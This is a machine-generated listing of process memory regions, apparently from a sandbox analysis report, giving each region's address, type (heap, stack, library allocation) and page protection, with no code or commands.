1CEA3642000
heap
page read and write
2604D513000
heap
page read and write
7FFE7DD50000
trusted library allocation
page execute and read and write
1CEA310F000
heap
page read and write
7FFE7E020000
trusted library allocation
page read and write
2207000
trusted library allocation
page read and write
7FFE7DE36000
trusted library allocation
page read and write
1CEA28A8000
heap
page read and write
25CF7AF5000
heap
page read and write
806000
trusted library allocation
page execute and read and write
25CF7AF5000
heap
page read and write
6CF000
stack
page read and write
7D0000
heap
page read and write
61B000
heap
page read and write
1CEA36E8000
heap
page read and write
276885A0000
heap
page read and write
1CEA317D000
heap
page read and write
720000
heap
page read and write
2768A070000
trusted library allocation
page read and write
4EB0000
heap
page read and write
56A0000
heap
page read and write
2768A22E000
trusted library allocation
page read and write
1CEA3152000
heap
page read and write
8B5000
heap
page read and write
1CEA3002000
heap
page read and write
162E000
stack
page read and write
25CF7A57000
heap
page read and write
7FFE7E16E000
trusted library allocation
page read and write
7FFE7DDC0000
trusted library allocation
page read and write
E9A0F7B000
stack
page read and write
880000
trusted library allocation
page execute and read and write
7FFE7DFE6000
trusted library allocation
page read and write
2768A3A3000
trusted library allocation
page read and write
5D9000
heap
page read and write
1CEA3712000
heap
page read and write
7FFE7E110000
trusted library allocation
page read and write
276A42D1000
heap
page read and write
25CF7861000
trusted library allocation
page read and write
1CEA3135000
heap
page read and write
3715000
trusted library allocation
page read and write
7FFE7E193000
trusted library allocation
page read and write
1CEA3135000
heap
page read and write
1CEA3159000
heap
page read and write
2D60000
heap
page read and write
CC280FE000
stack
page read and write
2604D502000
heap
page read and write
1CEA310E000
heap
page read and write
16D0000
trusted library allocation
page read and write
1CEA3174000
heap
page read and write
1CEA316D000
heap
page read and write
7FF4B7EB0000
trusted library allocation
page execute and read and write
1CEA36E5000
heap
page read and write
1CEA310E000
heap
page read and write
7FFE7DC7C000
trusted library allocation
page execute and read and write
2DEF000
trusted library allocation
page read and write
620000
heap
page read and write
1CEA3617000
heap
page read and write
E9A137E000
unkown
page readonly
25CF7B02000
heap
page read and write
339E000
stack
page read and write
7FFE7E030000
trusted library allocation
page read and write
25CF7A84000
heap
page read and write
7FFE7DCF0000
trusted library allocation
page execute and read and write
1CEA293B000
heap
page read and write
37B7000
trusted library allocation
page read and write
1CEA36C1000
heap
page read and write
1405000
trusted library allocation
page read and write
CDBC27E000
unkown
page readonly
117D000
heap
page read and write
950000
heap
page execute and read and write
7FFE7DC24000
trusted library allocation
page read and write
2768A22A000
trusted library allocation
page read and write
7FFE7DC7D000
trusted library allocation
page execute and read and write
30AD000
trusted library allocation
page read and write
1140000
heap
page read and write
1CEA3132000
heap
page read and write
1CEA3135000
heap
page read and write
1574000
trusted library allocation
page read and write
25CF7AF0000
heap
page read and write
2768A717000
trusted library allocation
page read and write
1CEA3685000
heap
page read and write
2768878E000
heap
page read and write
1CEA3182000
heap
page read and write
13FD000
stack
page read and write
DE0000
heap
page read and write
7FFE7DE50000
trusted library allocation
page read and write
12D40000
trusted library allocation
page read and write
1B2BD000
stack
page read and write
BBB000
unkown
page readonly
11C3000
heap
page read and write
5F3000
heap
page read and write
13BE000
stack
page read and write
1CEA2902000
heap
page read and write
7FFE7DE90000
trusted library allocation
page read and write
599000
heap
page read and write
1CEA3153000
heap
page read and write
1CEA3133000
heap
page read and write
CDBBC7E000
unkown
page readonly
DC0000
heap
page read and write
1C0000
heap
page read and write
1CEA3132000
heap
page read and write
7FFE7DED0000
trusted library allocation
page read and write
276A4010000
heap
page read and write
7FFE7E1B0000
trusted library allocation
page read and write
CDBBA7E000
unkown
page readonly
7FFE7DEC0000
trusted library allocation
page read and write
1138000
stack
page read and write
27688800000
heap
page read and write
3770000
trusted library allocation
page read and write
55B0000
trusted library allocation
page read and write
7FFE7DE30000
trusted library allocation
page read and write
1CEA3135000
heap
page read and write
276A2BB9000
heap
page read and write
B0E000
stack
page read and write
1BD10000
heap
page execute and read and write
167D000
trusted library allocation
page execute and read and write
590000
heap
page read and write
8A1000
unkown
page execute read
27688830000
heap
page read and write
1CEA3186000
heap
page read and write
1CEA316B000
heap
page read and write
1CEA282B000
heap
page read and write
25CF2529000
heap
page read and write
7FFE7DD1C000
trusted library allocation
page execute and read and write
E9A087E000
unkown
page readonly
1CEA367E000
heap
page read and write
5B0000
heap
page read and write
25CF242B000
heap
page read and write
25CF7A41000
heap
page read and write
1CEA3135000
heap
page read and write
7FFE7DCDC000
trusted library allocation
page execute and read and write
1CEA312E000
heap
page read and write
7FFE7DCBC000
trusted library allocation
page execute and read and write
2604D402000
heap
page read and write
1CEA3682000
heap
page read and write
4C83000
heap
page read and write
1682000
trusted library allocation
page read and write
7FFE7DC20000
trusted library allocation
page read and write
1CEA3713000
heap
page read and write
7FFE7DEF1000
trusted library allocation
page read and write
3780000
trusted library allocation
page read and write
7FFE7DDD9000
trusted library allocation
page read and write
1CEA310E000
heap
page read and write
25CF7B00000
heap
page read and write
25CF7C00000
remote allocation
page read and write
1B8C0000
unkown
page readonly
25CF2D1A000
heap
page read and write
2604D400000
heap
page read and write
2768A226000
trusted library allocation
page read and write
1CEA360F000
heap
page read and write
1CEA3734000
heap
page read and write
7FFE7DE9E000
trusted library allocation
page read and write
2604D115000
trusted library allocation
page read and write
1C5F0000
heap
page read and write
25CF78C9000
trusted library allocation
page read and write
276A4224000
heap
page read and write
1CEA36F6000
heap
page read and write
25CF79C0000
trusted library allocation
page read and write
1CEA3132000
heap
page read and write
39F0000
trusted library allocation
page read and write
4CB2000
heap
page read and write
1CEA3135000
heap
page read and write
7FFE7E150000
trusted library allocation
page read and write
1CEA3178000
heap
page read and write
1CEA36EC000
heap
page read and write
276A2F4D000
heap
page read and write
D90000
heap
page read and write
85F000
stack
page read and write
A0000
unkown
page readonly
2769A1BC000
trusted library allocation
page read and write
276A2F67000
heap
page read and write
1B2BE000
stack
page read and write
1479000
heap
page read and write
1CEA3140000
heap
page read and write
1AD9C000
heap
page read and write
4121000
trusted library allocation
page read and write
1CEA36EC000
heap
page read and write
8AD000
unkown
page readonly
25CF77E0000
trusted library allocation
page read and write
750000
heap
page read and write
1CEA36C3000
heap
page read and write
CC279FE000
stack
page read and write
276A4121000
heap
page read and write
6EB8EF9000
stack
page read and write
1CEA3133000
heap
page read and write
3730000
trusted library allocation
page read and write
7FFE7DC30000
trusted library allocation
page read and write
CDBC67C000
stack
page read and write
2768A1D7000
trusted library allocation
page read and write
276A4180000
heap
page read and write
1CEA360D000
heap
page read and write
25CF7ADE000
heap
page read and write
C9E000
stack
page read and write
CDBB77E000
unkown
page readonly
3121000
trusted library allocation
page read and write
276A4309000
heap
page read and write
5230000
trusted library allocation
page read and write
1580000
trusted library allocation
page read and write
1B6FF000
stack
page read and write
1CEA310E000
heap
page read and write
1428000
trusted library allocation
page read and write
1CEA3130000
heap
page read and write
276A413C000
heap
page read and write
7FFE7DD20000
trusted library allocation
page execute and read and write
7FFE7DC50000
trusted library allocation
page read and write
1CEA310E000
heap
page read and write
1CEA3133000
heap
page read and write
1CEA3174000
heap
page read and write
1750000
trusted library allocation
page read and write
2769A0D2000
trusted library allocation
page read and write
1CEA3133000
heap
page read and write
7FFE7DD10000
trusted library allocation
page read and write
7FFE7DE20000
trusted library allocation
page read and write
1C611000
heap
page read and write
7FFE7DE00000
trusted library allocation
page read and write
CDBB87E000
unkown
page readonly
1CEA3129000
heap
page read and write
1770000
trusted library allocation
page read and write
27688762000
heap
page read and write
7D7000
heap
page read and write
25CF2478000
heap
page read and write
1AD5C000
heap
page read and write
25CF7C00000
remote allocation
page read and write
1CEA2FC0000
remote allocation
page read and write
79A000
heap
page read and write
7FFE7DFE4000
trusted library allocation
page read and write
1CEA3133000
heap
page read and write
1CEA294C000
heap
page read and write
27688660000
trusted library allocation
page read and write
36E2000
trusted library allocation
page read and write
1CEA369A000
heap
page read and write
276A4174000
heap
page read and write
76E000
stack
page read and write
7FFE7DC4D000
trusted library allocation
page execute and read and write
25CF2D13000
heap
page read and write
276A414D000
heap
page read and write
6EB8BFF000
stack
page read and write
276A2AD0000
heap
page read and write
AEC000
heap
page read and write
25CF3320000
trusted library allocation
page read and write
40A0000
trusted library allocation
page read and write
7FFE7DE30000
trusted library allocation
page read and write
3F90000
trusted library allocation
page execute and read and write
1CEA2822000
heap
page read and write
7FFE7DDE3000
trusted library allocation
page read and write
25CF3400000
trusted library section
page readonly
7FFE7DF80000
trusted library allocation
page read and write
2604D500000
heap
page read and write
1CEA3130000
heap
page read and write
1CEA36E5000
heap
page read and write
1CEA3133000
heap
page read and write
143A000
trusted library allocation
page read and write
1C3EE000
stack
page read and write
1CEA3129000
heap
page read and write
1CEA3179000
heap
page read and write
1CEA3132000
heap
page read and write
8C6000
heap
page read and write
7FFE7E14C000
trusted library allocation
page read and write
2768A2CB000
trusted library allocation
page read and write
DD5000
heap
page read and write
276A2F3E000
heap
page read and write
36FE000
trusted library allocation
page read and write
1CEA3133000
heap
page read and write
1B372000
unkown
page readonly
25CF2E01000
trusted library allocation
page read and write
994000
heap
page read and write
E9A18FE000
stack
page read and write
7FFE7DC4D000
trusted library allocation
page execute and read and write
1CEA3135000
heap
page read and write
313E000
trusted library allocation
page read and write
1CEA28F8000
heap
page read and write
11D0000
heap
page execute and read and write
7FFE7DE00000
trusted library allocation
page read and write
7FFE7DE60000
trusted library allocation
page read and write
1CEA3133000
heap
page read and write
1CEA3184000
heap
page read and write
1CEA315C000
heap
page read and write
1CEA3015000
heap
page read and write
1CEA3130000
heap
page read and write
1CEA3113000
heap
page read and write
1CEA3133000
heap
page read and write
7FFE7DFB0000
trusted library allocation
page read and write
25CF79B0000
trusted library allocation
page read and write
143B000
heap
page read and write
7FFE7DE26000
trusted library allocation
page read and write
1CEA313B000
heap
page read and write
276A4048000
heap
page read and write
1CEA2800000
heap
page read and write
679000
heap
page read and write
4FD000
stack
page read and write
BC3000
unkown
page readonly
7E0000
trusted library allocation
page read and write
1CEA3110000
heap
page read and write
1CEA3702000
heap
page read and write
1CEA28AA000
heap
page read and write
CDBBE7E000
unkown
page readonly
1CEA294C000
heap
page read and write
1CEA36E9000
heap
page read and write
27688640000
trusted library allocation
page read and write
25CF245B000
heap
page read and write
1CEA291E000
heap
page read and write
1CEA28E6000
heap
page read and write
12421000
trusted library allocation
page read and write
1ADAD000
heap
page read and write
276A2F51000
heap
page read and write
2F6E000
stack
page read and write
BB0000
unkown
page readonly
37A0000
trusted library allocation
page read and write
276886EC000
heap
page read and write
1CEA2913000
heap
page read and write
7C0000
trusted library allocation
page read and write
1CEA3723000
heap
page read and write
7FFE7DF40000
trusted library allocation
page read and write
1CEA310E000
heap
page read and write
66B000
heap
page read and write
1CEA3130000
heap
page read and write
7FFE7DC32000
trusted library allocation
page read and write
1CEA3135000
heap
page read and write
7FFE7DE50000
trusted library allocation
page read and write
7FFE7E160000
trusted library allocation
page read and write
CDBB978000
stack
page read and write
1CEA310E000
heap
page read and write
5580000
trusted library allocation
page read and write
2604D002000
unkown
page read and write
CDBB0AB000
stack
page read and write
1CEA316E000
heap
page read and write
276886D2000
heap
page read and write
1CEA3184000
heap
page read and write
7FFE7DE70000
trusted library allocation
page read and write
242F000
trusted library allocation
page read and write
1CEA3137000
heap
page read and write
B18000
heap
page read and write
B4E000
stack
page read and write
1B8E0000
heap
page read and write
5692000
unkown
page readonly
1AD05000
heap
page read and write
276A27E0000
heap
page execute and read and write
1C1A0000
heap
page read and write
2CEE000
stack
page read and write
276A41FB000
heap
page read and write
25CF7930000
trusted library allocation
page read and write
1680000
trusted library allocation
page read and write
7FFE7DC34000
trusted library allocation
page read and write
3DCE000
stack
page read and write
1CEA312A000
heap
page read and write
1CEA3135000
heap
page read and write
3701000
trusted library allocation
page read and write
7FFE7DE90000
trusted library allocation
page read and write
2604CFB0000
heap
page read and write
276A2B46000
heap
page read and write
E9A0979000
stack
page read and write
7FFE7E080000
trusted library allocation
page read and write
2604D010000
unkown
page read and write
E9A127E000
unkown
page readonly
1CEA312E000
heap
page read and write
1ACF0000
heap
page read and write
37D0000
trusted library allocation
page read and write
3F40000
trusted library allocation
page read and write
1AFBF000
stack
page read and write
1CEA3129000
heap
page read and write
1CEA36BC000
heap
page read and write
54D0000
trusted library allocation
page execute and read and write
7FFE7DE30000
trusted library allocation
page read and write
1B723000
heap
page execute and read and write
E9A107E000
unkown
page readonly
7FFE7DF30000
trusted library allocation
page read and write
3F80000
trusted library allocation
page read and write
1CEA3100000
heap
page read and write
7FFE7DCE0000
trusted library allocation
page execute and read and write
1CEA3159000
heap
page read and write
7FFE7DC3D000
trusted library allocation
page execute and read and write
1CEA28A3000
heap
page read and write
1CEA3130000
heap
page read and write
2769A1B0000
trusted library allocation
page read and write
1ADB1000
heap
page read and write
1CEA316D000
heap
page read and write
5560000
unkown
page readonly
276A5F59000
heap
page read and write
1CEA3702000
heap
page read and write
CC283FD000
stack
page read and write
CC285FE000
stack
page read and write
1CEA2680000
heap
page read and write
2604D102000
trusted library allocation
page read and write
7FFE7DEA0000
trusted library allocation
page read and write
7FFE7E140000
trusted library allocation
page read and write
1CEA315A000
heap
page read and write
276A5F36000
heap
page read and write
1EF60000
trusted library allocation
page read and write
1CEA3726000
heap
page read and write
25CF77D0000
trusted library allocation
page read and write
1CEA3180000
heap
page read and write
730000
heap
page read and write
2BE0000
heap
page read and write
1CEA36F2000
heap
page read and write
7FFE7DE07000
trusted library allocation
page read and write
7FFE7DCE0000
trusted library allocation
page read and write
CC278FB000
stack
page read and write
1CEA293B000
heap
page read and write
2768A249000
trusted library allocation
page read and write
E9A0C7E000
unkown
page readonly
1CEA3132000
heap
page read and write
276A2BB7000
heap
page read and write
4090000
trusted library allocation
page read and write
3790000
trusted library allocation
page execute and read and write
1CEA3130000
heap
page read and write
1CEA3110000
heap
page read and write
8C0000
heap
page read and write
1CEA3130000
heap
page read and write
276A4133000
heap
page read and write
1189000
heap
page read and write
7FFE7DC44000
trusted library allocation
page read and write
7FFE7DFC0000
trusted library allocation
page read and write
1663000
trusted library allocation
page execute and read and write
710000
heap
page read and write
3720000
trusted library allocation
page read and write
276A419F000
heap
page read and write
25CF2C00000
heap
page read and write
1CEA3152000
heap
page read and write
7FFE7DE19000
trusted library allocation
page read and write
25CF23C0000
trusted library section
page read and write
7FFE7DC54000
trusted library allocation
page read and write
1260000
heap
page read and write
CC27153000
stack
page read and write
7FFE7DE40000
trusted library allocation
page read and write
815000
trusted library allocation
page execute and read and write
25CF7C00000
remote allocation
page read and write
1BC10000
heap
page read and write
1CEA2FC0000
remote allocation
page read and write
1CEA315C000
heap
page read and write
E9A0577000
stack
page read and write
1CEA36D8000
heap
page read and write
7FFE7DD46000
trusted library allocation
page execute and read and write
1670000
trusted library allocation
page read and write
81B000
trusted library allocation
page execute and read and write
25CF2440000
heap
page read and write
1760000
heap
page read and write
1CEA3712000
heap
page read and write
1CEA3133000
heap
page read and write
25CF7ABD000
heap
page read and write
1B370000
unkown
page readonly
1CEA315C000
heap
page read and write
1CEA3182000
heap
page read and write
1CEA293B000
heap
page read and write
25CF2D00000
heap
page read and write
1CEA3129000
heap
page read and write
118E000
stack
page read and write
CC271DE000
stack
page read and write
276A4261000
heap
page read and write
7FFE7DE87000
trusted library allocation
page read and write
276A4151000
heap
page read and write
1CEA3185000
heap
page read and write
1EE000
stack
page read and write
CDBBB7B000
stack
page read and write
7FFE7DE50000
trusted library allocation
page read and write
2768A21A000
trusted library allocation
page read and write
276A2AF7000
heap
page read and write
2211000
trusted library allocation
page read and write
276A4037000
heap
page read and write
5574000
unkown
page readonly
1CEA3713000
heap
page read and write
276886D8000
heap
page read and write
1CEA287A000
heap
page read and write
7FFE7DE20000
trusted library allocation
page execute and read and write
25CF3440000
trusted library section
page readonly
1CEA36DF000
heap
page read and write
1180000
heap
page read and write
2240000
unkown
page readonly
2BC0000
trusted library allocation
page read and write
2BE0000
trusted library allocation
page read and write
1CEA3705000
heap
page read and write
2768A068000
trusted library allocation
page read and write
CDBBF7E000
stack
page read and write
25CF8000000
heap
page read and write
2768A5EB000
trusted library allocation
page read and write
276A405D000
heap
page read and write
1270000
heap
page read and write
128E000
stack
page read and write
276A2893000
heap
page execute and read and write
25CF7890000
trusted library allocation
page read and write
276A41BD000
heap
page read and write
276A2B34000
heap
page read and write
1CEA36CA000
heap
page read and write
1CEA315B000
heap
page read and write
25CF7A53000
heap
page read and write
12D31000
trusted library allocation
page read and write
276A425D000
heap
page read and write
3A10000
trusted library allocation
page read and write
7FFE7DC4B000
trusted library allocation
page execute and read and write
1695000
trusted library allocation
page execute and read and write
1CEA293B000
heap
page read and write
1CEA3000000
heap
page read and write
1CEA36F6000
heap
page read and write
25CF7880000
trusted library allocation
page read and write
31CF000
trusted library allocation
page read and write
7FFE7DF60000
trusted library allocation
page read and write
1CEA2813000
heap
page read and write
BC1000
unkown
page write copy
2604CFD0000
heap
page read and write
1CEA3135000
heap
page read and write
7FFE7E090000
trusted library allocation
page execute and read and write
25CF7B1B000
heap
page read and write
7FFE7DC33000
trusted library allocation
page execute and read and write
6EB87DD000
stack
page read and write
1CEA3109000
heap
page read and write
276A27B0000
heap
page read and write
7FFE7DF20000
trusted library allocation
page read and write
7FFE7DE0C000
trusted library allocation
page read and write
3F10000
trusted library allocation
page read and write
1CEA2873000
heap
page read and write
12D3E000
trusted library allocation
page read and write
7FFE7DDD1000
trusted library allocation
page read and write
8B4000
unkown
page read and write
2769A2A6000
trusted library allocation
page read and write
1CEA3132000
heap
page read and write
1CEA3133000
heap
page read and write
7FFE7DD40000
trusted library allocation
page execute and read and write
79D000
stack
page read and write
300E000
stack
page read and write
7FFE7E180000
trusted library allocation
page read and write
1CEA3644000
heap
page read and write
1692000
trusted library allocation
page read and write
276A2F45000
heap
page read and write
A61000
heap
page read and write
1CEA315B000
heap
page read and write
25CF78A4000
trusted library allocation
page read and write
7FFE7DF50000
trusted library allocation
page read and write
7FFE7DDF0000
trusted library allocation
page read and write
1BC95000
heap
page read and write
311F000
stack
page read and write
7FFE7DCE6000
trusted library allocation
page read and write
E9A077E000
stack
page read and write
27688600000
heap
page read and write
1CEA3180000
heap
page read and write
11C0000
trusted library allocation
page read and write
7FFE7DCD6000
trusted library allocation
page read and write
1C62A000
heap
page read and write
7FFE7DC40000
trusted library allocation
page read and write
7FFE7DCD0000
trusted library allocation
page read and write
7FFE7DC5B000
trusted library allocation
page execute and read and write
1B1BE000
stack
page read and write
1CEA3133000
heap
page read and write
1BAEF000
stack
page read and write
7FFE7DEA0000
trusted library allocation
page read and write
8B0000
heap
page read and write
7FFE7DED3000
trusted library allocation
page read and write
E9A12FE000
stack
page read and write
67F000
heap
page read and write
2604CFE0000
trusted library allocation
page read and write
25CF2D02000
heap
page read and write
1CEA315C000
heap
page read and write
25CF7A0D000
heap
page read and write
1CEA3163000
heap
page read and write
3010000
heap
page execute and read and write
1CEA3133000
heap
page read and write
7FFE7DE00000
trusted library allocation
page read and write
3CCE000
stack
page read and write
25CF2400000
heap
page read and write
A20000
trusted library allocation
page read and write
1CEA3130000
heap
page read and write
1CEA36B7000
heap
page read and write
25CF7860000
trusted library allocation
page read and write
1CEA294C000
heap
page read and write
12BE000
stack
page read and write
1CEA3129000
heap
page read and write
E9A0E7E000
unkown
page readonly
31BF000
trusted library allocation
page read and write
16C0000
trusted library allocation
page execute and read and write
2E6E000
stack
page read and write
C2E000
stack
page read and write
E9A0D7C000
stack
page read and write
1CEA3107000
heap
page read and write
25CF2513000
heap
page read and write
E9A17FE000
stack
page read and write
1CEA3135000
heap
page read and write
3F30000
trusted library allocation
page read and write
25CF24B2000
heap
page read and write
1780000
heap
page read and write
1CEA310E000
heap
page read and write
7F0000
trusted library allocation
page read and write
3A00000
trusted library allocation
page read and write
1CEA315D000
heap
page read and write
276A2920000
heap
page read and write
1CEA310E000
heap
page read and write
1CEA315C000
heap
page read and write
BBB000
unkown
page readonly
25CF7A2A000
heap
page read and write
1B9EF000
stack
page read and write
1CEA3133000
heap
page read and write
31DF000
trusted library allocation
page read and write
276A2840000
trusted library section
page readonly
7FFE7DDD5000
trusted library allocation
page read and write
5BD000
heap
page read and write
1166000
heap
page read and write
276A2F10000
heap
page read and write
276A42EC000
heap
page read and write
2B90000
heap
page read and write
B0C000
heap
page read and write
276A2B61000
heap
page read and write
25CF2380000
heap
page read and write
3F60000
trusted library allocation
page read and write
2768A59C000
trusted library allocation
page read and write
25CF3450000
trusted library section
page readonly
169B000
trusted library allocation
page execute and read and write
7FFE7DE55000
trusted library allocation
page read and write
1CEA3135000
heap
page read and write
A30000
heap
page read and write
7E4000
trusted library allocation
page read and write
16B0000
trusted library allocation
page read and write
241F000
stack
page read and write
25CF7860000
trusted library allocation
page read and write
147B000
heap
page read and write
580000
trusted library allocation
page read and write
276A5F3D000
heap
page read and write
1100000
heap
page read and write
7FFE7E000000
trusted library allocation
page read and write
7FFE7DC23000
trusted library allocation
page execute and read and write
1CEA3157000
heap
page read and write
7FFE7DE90000
trusted library allocation
page read and write
276A41D4000
heap
page read and write
1CEA293B000
heap
page read and write
25CF248E000
heap
page read and write
25CF24A0000
heap
page read and write
1410000
heap
page read and write
2604D000000
unkown
page read and write
5B4000
heap
page read and write
117A000
heap
page read and write
CC281FD000
stack
page read and write
1AD15000
heap
page read and write
1CEA3185000
heap
page read and write
25CF2C02000
heap
page read and write
7FFE7DF10000
trusted library allocation
page read and write
1CEA36B8000
heap
page read and write
1CEA3713000
heap
page read and write
1CEA366F000
heap
page read and write
25CF7840000
trusted library allocation
page read and write
100F000
stack
page read and write
7FFE7DE20000
trusted library allocation
page read and write
7FFE7DE40000
trusted library allocation
page read and write
CC27AFD000
stack
page read and write
3F20000
trusted library allocation
page execute and read and write
2769A074000
trusted library allocation
page read and write
1CEA3129000
heap
page read and write
1CEA3130000
heap
page read and write
1660000
trusted library allocation
page read and write
1BCAA000
heap
page read and write
276A4251000
heap
page read and write
7FD000
trusted library allocation
page execute and read and write
25CF2428000
heap
page read and write
1CEA3156000
heap
page read and write
7FFE7E190000
trusted library allocation
page read and write
25CF3430000
trusted library section
page readonly
BB1000
unkown
page execute read
1CEA3700000
heap
page read and write
7FFE7DE80000
trusted library allocation
page read and write
276A41AE000
heap
page read and write
ACE000
stack
page read and write
7FFE7DDD0000
trusted library allocation
page read and write
1CEA2825000
heap
page read and write
CC286FE000
stack
page read and write
1CEA3133000
heap
page read and write
6FC000
stack
page read and write
110E000
stack
page read and write
1CEA2847000
heap
page read and write
276A5F69000
heap
page read and write
669000
heap
page read and write
7FFE7DE4B000
trusted library allocation
page read and write
1BDA0000
heap
page read and write
1CEA316D000
heap
page read and write
1D0000
heap
page read and write
25CF2D5B000
heap
page read and write
1CEA36C1000
heap
page read and write
7FFE7DE70000
trusted library allocation
page read and write
ACF000
heap
page read and write
119B000
heap
page read and write
7FFE7DE8E000
trusted library allocation
page read and write
1CEA36EF000
heap
page read and write
31BD000
trusted library allocation
page read and write
54C0000
heap
page read and write
7F7000
trusted library allocation
page read and write
E9A167E000
unkown
page readonly
A49000
heap
page read and write
1CEA3156000
heap
page read and write
2310000
heap
page read and write
1F0000
heap
page read and write
1CEA3133000
heap
page read and write
1CEA312A000
heap
page read and write
1CEA3184000
heap
page read and write
1CEA312E000
heap
page read and write
7FFE7DDF0000
trusted library allocation
page read and write
1CEA3133000
heap
page read and write
1CEA3153000
heap
page read and write
27699FE1000
trusted library allocation
page read and write
1CEA3153000
heap
page read and write
E99FFDB000
stack
page read and write
7FFE7DC64000
trusted library allocation
page read and write
1396000
trusted library allocation
page read and write
1CEA36B2000
heap
page read and write
5D3000
heap
page read and write
1BD30000
trusted library allocation
page read and write
7FFE7DDDC000
trusted library allocation
page read and write
E9A11FE000
stack
page read and write
7FFE7E130000
trusted library allocation
page execute and read and write
7FFE7DFF0000
trusted library allocation
page read and write
5562000
unkown
page readonly
7FFE7DE17000
trusted library allocation
page read and write
27689FE1000
trusted library allocation
page read and write
500000
heap
page read and write
CDBC17B000
stack
page read and write
CDBC07E000
unkown
page readonly
1CEA36EE000
heap
page read and write
1CEA3724000
heap
page read and write
276885C0000
heap
page read and write
1430000
heap
page read and write
7FFE7DDEE000
trusted library allocation
page read and write
1CEA36DD000
heap
page read and write
1CEA3130000
heap
page read and write
7FFE7DDE7000
trusted library allocation
page read and write
25CF7B0B000
heap
page read and write
25CF2502000
heap
page read and write
1CEA312E000
heap
page read and write
1C5F9000
heap
page read and write
7FFE7DC2D000
trusted library allocation
page execute and read and write
1AD4C000
heap
page read and write
276A2F00000
heap
page read and write
1CEA3159000
heap
page read and write
7FFE7DE10000
trusted library allocation
page execute and read and write
1CEA3152000
heap
page read and write
1CEA36BC000
heap
page read and write
7FFE7DC84000
trusted library allocation
page read and write
7FFE7DE80000
trusted library allocation
page read and write
2768A05F000
trusted library allocation
page read and write
7FFE7DD80000
trusted library allocation
page execute and read and write
2769A1B6000
trusted library allocation
page read and write
157C000
trusted library allocation
page read and write
CDBBD7B000
stack
page read and write
276A2010000
trusted library allocation
page read and write
1CEA3135000
heap
page read and write
7FFE7E060000
trusted library allocation
page execute and read and write
E9A1E7E000
stack
page read and write
7FFE7E120000
trusted library allocation
page read and write
276A42C2000
heap
page read and write
1CEA3110000
heap
page read and write
1CEA287E000
heap
page read and write
36EC000
trusted library allocation
page read and write
2604D502000
heap
page read and write
1CEA3155000
heap
page read and write
There are 1164 hidden memdumps, click here to show them.